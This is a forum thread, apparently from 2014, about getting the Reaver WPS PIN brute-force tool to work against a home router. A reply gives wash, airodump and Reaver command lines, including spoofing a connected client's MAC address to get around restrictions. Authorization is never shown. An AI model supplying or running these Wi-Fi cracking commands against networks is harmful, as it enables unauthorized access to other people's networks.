Hello, this is my problem: [+] Switching mon0 to channel 1 [+] Waiting for beacon from F4:3E:61:xx:xx:xx [+] Associated with F4:3E:61:xx:xx:xx (Essid: PTCL-BB ) [+] Trying pin 12345670 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response Using: reaver -i mon0 -b F4:3E:61:xx:xx:xx -a -vv (also tried -a, -N -S and all the combinations but none of theme seems to work ) I'm not far from modem. It's a strong signal. I waited for long time, but nothing happens. Why? What is the problem? Thanks.
Hey u living in Pakistan try this: 1) open a terminal 2) type: wash -i mon0 Now you will see a list of routers that supports WPS. Now check whether the WPS of your router is locked or not. If the above solution doesnt work then spoof the MAC address of an already connected client to router by adding the argument in reaver: -m CLIENTADDRESS Example: reaver -i mon0 -b F4:3E:61:xx:xx:xx -a -vv -m 12:34:56:78:90:AA ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Still doesnt work? Use this combination instead: airodump mon0 -c APCHANNEL reaver -i mon0 -b APBSSID -c APCHANNEL -vv -d 1 -N -t 5 -T 5 -S -m CLIENTADDRESS Dont forget to reply.
Hi, I have tested this but still stuck at "Sending identity response" --- Double Post Merged, 19 Mar 2014 --- Experts! Please help..... --- Double Post Merged, 24 Mar 2014 --- Nobody faced this issue ever ?? stuck at "Sending identity response"
when i use this command #wash -i mon0 i found some routers but it doesn't shows my router name and any sort of data related to my router but when i use #airodump-ng mon0 it found my router. what type of problem it is? and when i use reaver command with to get wps pin it stuck at [+] Trying pin 12345670 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response can you help me plz